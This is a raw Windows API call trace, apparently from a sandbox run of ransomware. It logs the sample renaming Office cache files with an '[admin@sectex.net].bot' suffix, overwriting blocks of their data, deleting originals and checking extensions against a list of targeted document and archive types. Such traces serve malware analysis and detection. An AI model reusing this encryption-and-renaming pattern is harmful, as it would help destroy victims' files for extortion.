	[0040.704] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xd7200, lpOverlapped=0x0) returned 1
	[0040.953] WriteFile (in: hFile=0x1a4, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xd7210, lpOverlapped=0x0) returned 1
	[0040.980] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.980] WriteFile (in: hFile=0x1a4, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.980] SetEndOfFile (hFile=0x1a4) returned 1
	[0040.980] CloseHandle (hObject=0x1a4) returned 1
	[0040.987] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.987] SetEndOfFile (hFile=0x184) returned 1
	[0041.367] CloseHandle (hObject=0x184) returned 1
	[0041.368] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0041.368] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1
	[0041.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.368] lstrlenW (lpString=".doc") returned 4
	[0041.368] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0041.368] lstrlenW (lpString=".docx") returned 5
	[0041.368] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0041.368] lstrlenW (lpString=".pdf") returned 4
	[0041.368] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0041.368] lstrlenW (lpString=".xls") returned 4
	[0041.368] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0041.368] lstrlenW (lpString=".xlsx") returned 5
	[0041.368] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0041.368] lstrlenW (lpString=".ppt") returned 4
	[0041.368] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0041.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.368] lstrlenW (lpString=".zip") returned 4
	[0041.369] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString=".rar") returned 4
	[0041.369] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString=".bz2") returned 4
	[0041.369] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0041.369] lstrlenW (lpString=".7z") returned 3
	[0041.369] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString=".dbf") returned 4
	[0041.369] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString=".1cd") returned 4
	[0041.369] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString=".jpg") returned 4
	[0041.369] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString=".doc") returned 4
	[0041.369] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0041.369] lstrlenW (lpString=".docx") returned 5
	[0041.369] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0041.369] lstrlenW (lpString=".pdf") returned 4
	[0041.369] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString=".xls") returned 4
	[0041.369] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString=".xlsx") returned 5
	[0041.369] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0041.369] lstrlenW (lpString=".ppt") returned 4
	[0041.369] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.369] lstrlenW (lpString=".zip") returned 4
	[0041.369] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0041.369] lstrlenW (lpString=".rar") returned 4
	[0041.370] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0041.370] lstrlenW (lpString=".bz2") returned 4
	[0041.370] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0041.370] lstrlenW (lpString=".7z") returned 3
	[0041.370] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0041.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.370] lstrlenW (lpString=".dbf") returned 4
	[0041.370] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0041.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.370] lstrlenW (lpString=".1cd") returned 4
	[0041.370] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0041.370] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81
	[0041.370] lstrlenW (lpString=".jpg") returned 4
	[0041.370] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0041.370] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0041.370] lstrlenW (lpString="Proof.cab") returned 9
	[0041.370] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0041.370] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=21064532) returned 1
	[0041.370] CloseHandle (hObject=0x184) returned 1
	[0041.371] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020
	[0041.371] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.371] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0041.396] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0041.397] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0041.397] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0041.397] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0041.402] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0041.402] ReadFile (in: hFile=0x184, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0041.404] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0041.405] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0041.405] ReadFile (in: hFile=0x184, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0041.422] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.422] WriteFile (in: hFile=0x184, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0041.693] SetEndOfFile (hFile=0x184) returned 1
	[0041.693] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0041.697] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0041.697] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0041.698] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0041.698] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0041.699] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0041.699] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0041.700] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0041.700] CloseHandle (hObject=0x184) returned 1
	[0044.445] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.465] lstrlenW (lpString=".doc") returned 4
	[0044.465] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.467] lstrlenW (lpString=".docx") returned 5
	[0044.472] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0044.473] lstrlenW (lpString=".pdf") returned 4
	[0044.473] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString=".xls") returned 4
	[0044.473] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString=".xlsx") returned 5
	[0044.473] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0044.473] lstrlenW (lpString=".ppt") returned 4
	[0044.473] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.473] lstrlenW (lpString=".zip") returned 4
	[0044.473] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString=".rar") returned 4
	[0044.473] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString=".bz2") returned 4
	[0044.473] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.473] lstrlenW (lpString=".7z") returned 3
	[0044.473] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.473] lstrlenW (lpString=".dbf") returned 4
	[0044.473] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.473] lstrlenW (lpString=".1cd") returned 4
	[0044.473] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.473] lstrlenW (lpString=".jpg") returned 4
	[0044.473] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString=".doc") returned 4
	[0044.474] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString=".docx") returned 5
	[0044.474] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0044.474] lstrlenW (lpString=".pdf") returned 4
	[0044.474] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString=".xls") returned 4
	[0044.474] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString=".xlsx") returned 5
	[0044.474] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0044.474] lstrlenW (lpString=".ppt") returned 4
	[0044.474] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString=".zip") returned 4
	[0044.474] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString=".rar") returned 4
	[0044.474] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString=".bz2") returned 4
	[0044.474] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.474] lstrlenW (lpString=".7z") returned 3
	[0044.474] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString=".dbf") returned 4
	[0044.474] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString=".1cd") returned 4
	[0044.474] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81
	[0044.474] lstrlenW (lpString=".jpg") returned 4
	[0044.474] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.475] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0044.475] lstrlenW (lpString="GrooveLR.cab") returned 12
	[0044.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.475] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=4095519) returned 1
	[0044.475] CloseHandle (hObject=0x1a8) returned 1
	[0044.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020
	[0044.475] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.475] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.476] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.476] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.476] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.480] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.480] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.483] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.483] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.483] ReadFile (in: hFile=0x1a8, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.498] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.498] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0044.728] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.728] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0044.728] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.728] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.729] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.729] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.731] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.731] WriteFile (in: hFile=0x1a8, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.734] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0044.734] CloseHandle (hObject=0x1a8) returned 1
	[0044.734] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.734] lstrlenW (lpString=".doc") returned 4
	[0044.734] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.734] lstrlenW (lpString=".docx") returned 5
	[0044.735] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.735] lstrlenW (lpString=".pdf") returned 4
	[0044.735] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString=".xls") returned 4
	[0044.735] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString=".xlsx") returned 5
	[0044.735] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.735] lstrlenW (lpString=".ppt") returned 4
	[0044.735] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.735] lstrlenW (lpString=".zip") returned 4
	[0044.735] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString=".rar") returned 4
	[0044.735] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString=".bz2") returned 4
	[0044.735] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.735] lstrlenW (lpString=".7z") returned 3
	[0044.735] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.735] lstrlenW (lpString=".dbf") returned 4
	[0044.735] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.735] lstrlenW (lpString=".1cd") returned 4
	[0044.735] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.735] lstrlenW (lpString=".jpg") returned 4
